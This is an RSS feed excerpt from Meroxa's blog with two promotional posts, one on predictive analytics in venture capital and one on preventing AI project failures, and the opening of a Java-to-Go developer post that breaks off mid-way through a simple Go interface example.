isPermaLink="false">https://meroxa.com/blog/predictive-analytics-in-venture-capital-a-technical-deep-dive-for-tech-leaders</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Wed, 26 Feb 2025 13:15:00 GMT</pubDate><content:encoded>&lt;h3&gt;Introduction&lt;/h3&gt;
&lt;p&gt;Venture capital is undergoing a seismic shift—one driven by data, AI, and real-time analytics. Traditional investment strategies, built on intuition and historical heuristics, no longer suffice in an era where speed and precision define success. The ability to harness predictive analytics not only enhances decision-making but also mitigates risk and accelerates due diligence.&lt;/p&gt;
&lt;p&gt;Tech leaders in VC must evolve, leveraging AI, machine learning (ML), and data streaming technologies to drive smarter investments. This article explores how predictive analytics transforms venture capital and how platforms like Meroxa empower firms to seamlessly integrate real-time data pipelines for a competitive edge.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;The Data Challenge in Venture Capital&lt;/h3&gt;
&lt;p&gt;Venture capital decision-making has long been constrained by fragmented, unstructured, and outdated data. The key challenges include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data Overload:&lt;/strong&gt; Investors must process vast volumes of financial reports, founder backgrounds, market intelligence, and unstructured sentiment data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Risk Mitigation:&lt;/strong&gt; Identifying high-potential startups while filtering out high-risk ventures remains a complex task.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Time-Intensive Due Diligence:&lt;/strong&gt; Manual analysis of market signals and startup metrics delays decision-making, costing firms valuable opportunities.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/venture-capitalist-challenges.png&quot; alt=&quot;market-data-vc.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Illustrates the data fragmentation issues and challenges in VC.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Predictive analytics alleviates these challenges by structuring and interpreting complex datasets in real time, leading to faster, more accurate investment decisions.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;The Predictive Analytics Pipeline in Venture Capital&lt;/h3&gt;
&lt;p&gt;A modern VC analytics pipeline integrates multiple data sources, applies machine learning models, and delivers actionable insights. Here’s how:&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;1. Real-Time Data Collection &amp;#x26; Processing&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Data is the foundation of predictive analytics, and VC firms must aggregate structured and unstructured data from diverse sources:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Structured Data:&lt;/strong&gt; Investment rounds, revenue metrics, market trends, SEC filings.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Unstructured Data:&lt;/strong&gt; Social media sentiment, press coverage, industry trends, founder digital footprints.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Feeds:&lt;/strong&gt; Funding announcements, stock fluctuations, patent filings, hiring trends.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/data-ingestion-vc.png&quot; alt=&quot;market-data-vc.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Demonstrates data sources and ingestion mechanisms.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa’s Advantage:&lt;/strong&gt; With Meroxa’s Conduit Platform, VC firms can automate data ingestion from APIs (e.g., Crunchbase, PitchBook, Bloomberg) and enrich datasets in real time, eliminating the bottlenecks of legacy ETL pipelines.&lt;/p&gt;
&lt;p&gt;🔹 &lt;em&gt;Key Technologies:&lt;/em&gt; Real-time data ingestion, event-driven architectures, Apache Kafka, Apache Flink.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. Feature Engineering &amp;#x26; Data Modeling&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Raw data must be transformed into structured insights to train predictive models effectively. Feature engineering is crucial in determining:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Founder Signals:&lt;/strong&gt; Prior exits, domain expertise, network strength, investor relationships.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Market Traction:&lt;/strong&gt; User adoption, revenue growth, customer acquisition costs (CAC).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Competitive Landscape:&lt;/strong&gt; Market positioning, barriers to entry.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Macroeconomic Indicators:&lt;/strong&gt; Interest rates, regulatory risks.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/vc-raw-data-ingestion.png&quot; alt=&quot;market-data-vc.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Showcases the transformation of raw data into ML features.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa’s Advantage:&lt;/strong&gt; Meroxa automates feature extraction and transformation, allowing VC firms to enrich data pipelines dynamically without complex ETL dependencies.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;3. Machine Learning Model Training &amp;#x26; Predictions&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Once structured, data is fed into machine learning models to forecast startup success and optimize investment strategies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Classification Models:&lt;/strong&gt; Logistic regression, random forests, neural networks for success/failure predictions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Regression Models:&lt;/strong&gt; XGBoost, linear regression to forecast valuation growth.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Clustering Algorithms:&lt;/strong&gt; K-means, hierarchical clustering to segment startups by risk-return profiles.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/ml-learning.png&quot; alt=&quot;market-data-vc.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Depicts different ML models and how they are trained.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa’s Advantage:&lt;/strong&gt; By seamlessly integrating with ML platforms like Google Vertex AI and AWS SageMaker, Meroxa enables continuous model training on real-time data.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;4. Real-Time Risk Analysis &amp;#x26; Anomaly Detection&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Predictive analytics extends beyond forecasting; it proactively identifies emerging risks:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Sentiment Analysis:&lt;/strong&gt; NLP models scan Twitter, news, and LinkedIn for sentiment trends.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Anomaly Detection:&lt;/strong&gt; AI flags inconsistencies in financial statements and funding patterns.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Alerts:&lt;/strong&gt; AI-driven alerts notify investors of negative news trends, regulatory risks, or executive departures.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/risk-analysis-vc.png&quot; alt=&quot;market-data-vc.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Highlights the process of monitoring risk signals in real time.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa’s Advantage:&lt;/strong&gt; Using event-driven architectures, Meroxa delivers real-time anomaly detection, ensuring VC firms act swiftly on emerging risks.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;5. Portfolio Optimization &amp;#x26; Dynamic Investment Strategy&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Predictive analytics extends beyond startup selection to portfolio management:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;AI-Powered Capital Allocation:&lt;/strong&gt; Optimizes fund distribution across growth stages.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scenario Simulation:&lt;/strong&gt; Monte Carlo simulations test different economic conditions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Exit Strategy Forecasting:&lt;/strong&gt; Predicts optimal IPO, acquisition, or secondary market exit timing.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/market-data-vc.png&quot; alt=&quot;market-data-vc.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Illustrates AI-driven portfolio management strategies.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa’s Advantage:&lt;/strong&gt; By integrating reinforcement learning models, Meroxa ensures investment strategies dynamically evolve based on new market conditions.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;The Future of AI-Driven Venture Capital&lt;/h3&gt;
&lt;p&gt;As predictive analytics continues to evolve, we anticipate:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Explainable AI (XAI):&lt;/strong&gt; Reducing the black-box nature of VC funding models.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Blockchain &amp;#x26; Smart Contracts:&lt;/strong&gt; Automating equity tracking and funding disbursement.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Quantum Computing:&lt;/strong&gt; Unlocking ultra-complex investment simulations for multi-factor startup evaluations.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;VC firms must move beyond intuition-based decision-making and embrace AI-powered precision. Predictive analytics, when integrated with real-time data pipelines, unlocks unprecedented speed and accuracy in investment decisions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Meroxa is the missing link for tech-driven VC firms, providing the infrastructure to build real-time, AI-powered investment intelligence.&lt;/strong&gt; Check out a &lt;a href=&quot;https://www.meroxa.com/demo&quot;&gt;demo&lt;/a&gt; with one of our experts today! Also, follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[How Meroxa Helps Tech Leaders Prevent AI Project Failures and Maximize Success]]></title><description><![CDATA[AI projects often fail due to data bottlenecks, infrastructure complexity, and governance challenges. This blog explores how Meroxa helps tech leaders overcome these issues with real-time data movement, automation, and security, ensuring scalable, high-performance AI deployments. ]]></description><link>https://meroxa.com/blog/how-meroxa-helps-tech-leaders-prevent-ai-project-failures-and-maximize-success</link><guid isPermaLink="false">https://meroxa.com/blog/how-meroxa-helps-tech-leaders-prevent-ai-project-failures-and-maximize-success</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Thu, 20 Feb 2025 13:15:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;80% of AI projects fail&lt;/strong&gt;—don’t let yours be one of them. AI initiatives often struggle due to poor data quality, ineffective integration, and slow operationalization. Tech leaders need real-time, reliable data to ensure AI success.&lt;/p&gt;
&lt;p&gt;Meroxa provides the infrastructure to fix broken AI workflows—enabling real-time, automated, and scalable data movement.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;The Data Challenges That Lead to AI Failures&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;A recent RAND Corporation report revealed a startling reality: &lt;strong&gt;80% of AI projects fail&lt;/strong&gt;, leading to significant financial losses and wasted resources. For CTOs, CIOs, CDOs, and other tech leaders, this failure rate poses critical questions about how to design, implement, and scale AI initiatives successfully. The challenges often stem from poor data quality, ineffective integration strategies, and the inability to operationalize AI models efficiently.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/ai-failure-points.png&quot; alt=&quot;ai-failure-points.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Illustration of the major failure points in AI projects, from data quality issues to deployment challenges.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;At Meroxa, we believe that &lt;strong&gt;real-time data movement and infrastructure automation&lt;/strong&gt; are key to overcoming these challenges. Unlike traditional data integration solutions that struggle with latency, complexity, and inefficiency, Meroxa offers a streamlined approach with automated, real-time streaming capabilities. Our Conduit Platform not only ensures high-speed data availability but also simplifies deployment, reducing time-to-value for AI initiatives. Here’s how Meroxa can support your AI initiatives and drive successful outcomes.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Ensuring High-Quality, Real-Time Data for AI Models&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Many AI projects fail because they rely on outdated, incomplete, or low-quality data. &lt;strong&gt;AI is only as good as the data it learns from&lt;/strong&gt;—and without real-time, enriched, and clean data, even the most sophisticated models will underperform.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/ai-failure-start.png&quot; alt=&quot;ai-failure-start.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Visualization of Meroxa’s real-time data streaming pipeline and how it integrates into AI workflows.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data Streaming&lt;/strong&gt;: With Meroxa’s &lt;strong&gt;Conduit Platform&lt;/strong&gt;, organizations can stream real-time data from multiple sources (databases, event streams, APIs) directly into AI pipelines.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Quality &amp;#x26; Transformation&lt;/strong&gt;: Automate &lt;strong&gt;data enrichment, cleansing, and normalization&lt;/strong&gt; before feeding data into AI models, ensuring accuracy and consistency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability&lt;/strong&gt;: Handle high-velocity and high-volume data without performance bottlenecks, ensuring AI models receive timely insights.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Seamless Integration of AI Workflows with Data Infrastructure&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Many enterprises struggle with siloed data and disconnected workflows, making it difficult to integrate AI models with operational systems.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/ai-enterprise-applications.png&quot; alt=&quot;ai-enterprise-applications.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: How Meroxa seamlessly integrates AI models with enterprise applications.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Connect AI to Enterprise Systems&lt;/strong&gt;: Seamlessly integrate AI models with business applications (CRM, ERP, analytics dashboards) to enable real-time decision-making.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automated Data Pipelines&lt;/strong&gt;: Instead of manually stitching together complex data workflows, Meroxa automates AI data integration, reducing development time and human errors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Support for AI/ML Tooling&lt;/strong&gt;: Whether using &lt;strong&gt;Databricks, Snowflake, AWS SageMaker, or custom AI models&lt;/strong&gt;, Meroxa simplifies the movement of data to and from these environments.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Reducing Time-to-Value for AI Initiatives&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;70% of AI models never make it past the experimental phase because deployment takes too long. &lt;strong&gt;By the time an AI model is deployed, the data landscape may have changed, reducing its relevance and effectiveness.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/accelerates-ai-deployment.png&quot; alt=&quot;accelerates-ai-deployment.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: How real-time data movement accelerates AI deployment.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Faster AI Model Deployment&lt;/strong&gt;: Automate real-time data ingestion into AI training and inference workflows, shortening the feedback loop between data collection and model refinement.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Monitoring &amp;#x26; Observability&lt;/strong&gt;: Get &lt;strong&gt;end-to-end visibility&lt;/strong&gt; into data movement, transformations, and AI performance metrics to quickly identify and address issues.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Event-Driven Architectures&lt;/strong&gt;: Power AI-driven automation by streaming real-time events directly into decision engines and AI models.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Cost Optimization &amp;#x26; Infrastructure Efficiency&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;AI failures often translate to &lt;strong&gt;wasted infrastructure spend&lt;/strong&gt;, with research showing that up to 40% of AI project costs stem from inefficiencies in data movement and infrastructure management.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/ai-cost.png&quot; alt=&quot;ai-cost.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Cost breakdown of AI projects and how Meroxa optimizes expenses.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Cost-Effective Data Movement&lt;/strong&gt;: Optimize infrastructure spend with &lt;strong&gt;event-driven and real-time data pipelines&lt;/strong&gt;, reducing storage and processing overhead.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Eliminate Data Duplication &amp;#x26; Latency&lt;/strong&gt;: Avoid unnecessary data replication and ensure that only the most &lt;strong&gt;relevant, high-quality&lt;/strong&gt; data feeds into AI systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexible Cloud &amp;#x26; Hybrid Deployments&lt;/strong&gt;: Run AI workloads efficiently across &lt;strong&gt;cloud, on-premise, or hybrid environments&lt;/strong&gt; without additional complexity.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;AI Governance, Compliance &amp;#x26; Security&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;With increased scrutiny on AI ethics, bias, and regulatory compliance, organizations must ensure &lt;strong&gt;governance and transparency&lt;/strong&gt; in their AI pipelines.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/security.png&quot; alt=&quot;security.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Diagram: Overview of Meroxa’s AI governance and compliance framework.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How Meroxa Helps:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Data Lineage &amp;#x26; Auditing&lt;/strong&gt;: Track data movement and transformations to &lt;strong&gt;maintain compliance with AI governance policies&lt;/strong&gt;, such as GDPR and CCPA, by ensuring auditability and data traceability.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Security &amp;#x26; Access Controls&lt;/strong&gt;: Ensure that only authorized systems and users can access AI datasets, reducing security risks and meeting industry compliance requirements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;AI Explainability Support&lt;/strong&gt;: Streamline access to real-time metadata and historical data for AI model audits and explainability requirements, ensuring compliance with ethical AI frameworks like the EU AI Act.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion: Set Your AI Projects Up for Success with Meroxa&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The reality of AI project failures is daunting, but it is not inevitable. &lt;strong&gt;With the right data infrastructure, automation, and real-time capabilities, organizations can dramatically improve their AI success rates.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;For example, a leading financial services company leveraged Meroxa’s real-time data streaming to enhance fraud detection. By integrating real-time transactional data with AI-driven risk models, they reduced fraud detection time from hours to seconds, preventing up to 85% of fraudulent transactions and saving millions in potential losses.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ready to reduce AI failure rates and accelerate innovation?&lt;/strong&gt; Don’t let poor data infrastructure hold your AI projects back. Take action today. Let’s talk.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;&lt;strong&gt;Contact us now&lt;/strong&gt;&lt;/a&gt; to see how Meroxa can transform your AI data strategy. Schedule a demo and start optimizing your AI workflows today!
Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[From Java to Go:  A Developers Journey Pt. 1]]></title><description><![CDATA[Switching from Java to Go? In this first part of the series, I share my journey transitioning from Java to Go, including key differences, challenges, and lessons learned. From implicit interfaces to error handling, multiple return values, and no function overloading—discover what makes Go unique and how to navigate the switch effectively. Whether you're considering Go or already making the move, this guide will help you adapt to Go’s simplicity and efficiency. ]]></description><link>https://meroxa.com/blog/from-java-to-go-a-developers-journey-pt-1</link><guid isPermaLink="false">https://meroxa.com/blog/from-java-to-go-a-developers-journey-pt-1</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Thu, 20 Feb 2025 10:44:00 GMT</pubDate><content:encoded>&lt;h1&gt;Introduction&lt;/h1&gt;
&lt;p&gt;More than three years ago I joined Meroxa to work on &lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; and its connectors. This job change brought with itself another change for me: the programming language. Conduit and almost every of its connectors are written in Go. In the 11 years before that, I was working with Java. It’s been a change in many ways, I must confess.🙂&lt;/p&gt;
&lt;p&gt;That’s also a change many more developers are either making or thinking of making, so I’d like to share my experience hoping it will make your journey to Go better.&lt;/p&gt;
&lt;p&gt;This blog post is the first I plan to write on this topic. I&apos;ll share how I learned Go, give a brief overview of the language, and then dive into the differences between Java and Go, specifically in terms of interfaces and functions.&lt;/p&gt;
&lt;h1&gt;How I learned Go&lt;/h1&gt;
&lt;p&gt;A great way to start with Go is &lt;a href=&quot;https://go.dev/tour/welcome/1&quot;&gt;A Tour of Go&lt;/a&gt;.  It’s a tutorial made by the Go team that introduces you to the basic concepts in a very light way, but also lets you try out the code online!&lt;/p&gt;
&lt;p&gt;However, nothing beats a good book when you want to learn systematically. The first book I was reading about Go was &lt;a href=&quot;https://www.manning.com/books/go-in-action&quot;&gt;Go in Action&lt;/a&gt;, and then I switched to &lt;a href=&quot;https://www.gopl.io/&quot;&gt;The Go Programming Language&lt;/a&gt;. Go in Action is a good book, but nevertheless, I like The Go Programming Language more, mostly due to the approach. Go in Action starts with a comprehensive example project that’s sometimes difficult to follow because a few concepts are shown at a time. The Go Programming Language on the other hand focuses on individual syntax elements and concepts and gradually builds the knowledge.&lt;/p&gt;
&lt;p&gt;As for the hands-on experience, my first task was the &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-kafka&quot;&gt;Kafka connector&lt;/a&gt;. After that one was completed, I switched to some other connectors, Conduit itself, and I was also working for some time on what is now the Conduit Platform.&lt;/p&gt;
&lt;p&gt;A very important method of my learning were code reviews. My colleagues’ patience when reviewing my code, and answering questions about the project(s) and Go helped me tremendously. Another thing that helped me was reviewing the code myself. It was rarely for the sake of trying to improve someone else’s code, but most often for the sake of seeing more code and asking questions about it.&lt;/p&gt;
&lt;h1&gt;A quick introduction to Go&lt;/h1&gt;
&lt;p&gt;Many call it Golang, but, &lt;a href=&quot;https://go.dev/doc/faq#go_or_golang&quot;&gt;officially&lt;/a&gt;, the language’s name is Go.&lt;/p&gt;
&lt;p&gt;Go is a compiled language and needs no runtime in the sense Java does. When you find the Go runtime mentioned, what is meant by that is &lt;strong&gt;not a separate application&lt;/strong&gt; that is executing a binary and managing it (like the Java Runtime does). What is meant by Go runtime are Go’s internal packages that get included in a build and that, for example, execute goroutines (Go’s green threads). In other words, users don’t need to have a Go runtime installed to be able to run applications written in Go.&lt;/p&gt;
&lt;p&gt;The Go language is a lot about simplicity, clarity, and decoupling. Java code is sometimes known for its verbosity, and that’s true to an extent. Related to that is a famous &lt;a href=&quot;https://go-proverbs.github.io/&quot;&gt;Go proverb&lt;/a&gt; that says “A little copying is better than a little dependency.” It’s quite normal to grab an Apache Commons library to do a small thing or two in a Java project. However, in Go, you’ll just copy a few lines of code.&lt;/p&gt;
&lt;p&gt;When you &lt;a href=&quot;https://go.dev/doc/install&quot;&gt;install Go&lt;/a&gt; you also get quite some tools, such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;go build&lt;/code&gt; for building&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;go test&lt;/code&gt; for running tests (it works, but it&apos;s a shock after JUnit)&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;go get&lt;/code&gt; for getting dependencies,&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;go install&lt;/code&gt; for installing runnable tools (think of a package manager kind of thing)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Go itself provides a way to manage dependencies, which is &lt;a href=&quot;https://go.dev/ref/mod#vcs-find&quot;&gt;go.mod&lt;/a&gt; file (similar to &lt;code class=&quot;language-text&quot;&gt;build.gradle&lt;/code&gt; or &lt;code class=&quot;language-text&quot;&gt;pom.xml&lt;/code&gt; ). Dependencies are most often found on GitHub and fetched through &lt;a href=&quot;https://pkg.go.dev/&quot;&gt;pkg.go.dev&lt;/a&gt; (indirectly).&lt;/p&gt;
&lt;p&gt;Now let’s get to the code!&lt;/p&gt;
&lt;h1&gt;Interfaces&lt;/h1&gt;
&lt;p&gt;Go interfaces and Java interfaces are declared in similar ways, so we won’t spend too much time on that. One difference is that Go doesn’t allow default interface methods, whereas Java does. The second, and probably biggest, difference is how the interfaces are used.&lt;/p&gt;
&lt;p&gt;Java uses a &lt;a href=&quot;https://en.wikipedia.org/wiki/Nominal_type_system&quot;&gt;nominative type system&lt;/a&gt;. Classes that implement an interface &lt;strong&gt;must&lt;/strong&gt; use the implements keyword, i.e. they show which behavior they implement &lt;strong&gt;explicitly&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Go’s type system is &lt;a href=&quot;https://en.wikipedia.org/wiki/Structural_type_system&quot;&gt;structural&lt;/a&gt;. Structs implement an interface &lt;strong&gt;implicitly&lt;/strong&gt; and the Go compiler checks if a value conforms to an interface. Here’s an example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; main

&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    &lt;span class=&quot;token string&quot;&gt;&quot;fmt&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; FileReader &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;f &lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;FileReader&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Read&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;a line from a file&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Reader &lt;span class=&quot;token keyword&quot;&gt;interface&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token function&quot;&gt;Read&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// declare a variable of the type Reader &lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; r Reader
    &lt;span class=&quot;token comment&quot;&gt;// Assign a pointer to a FileReader to r&lt;/span&gt;
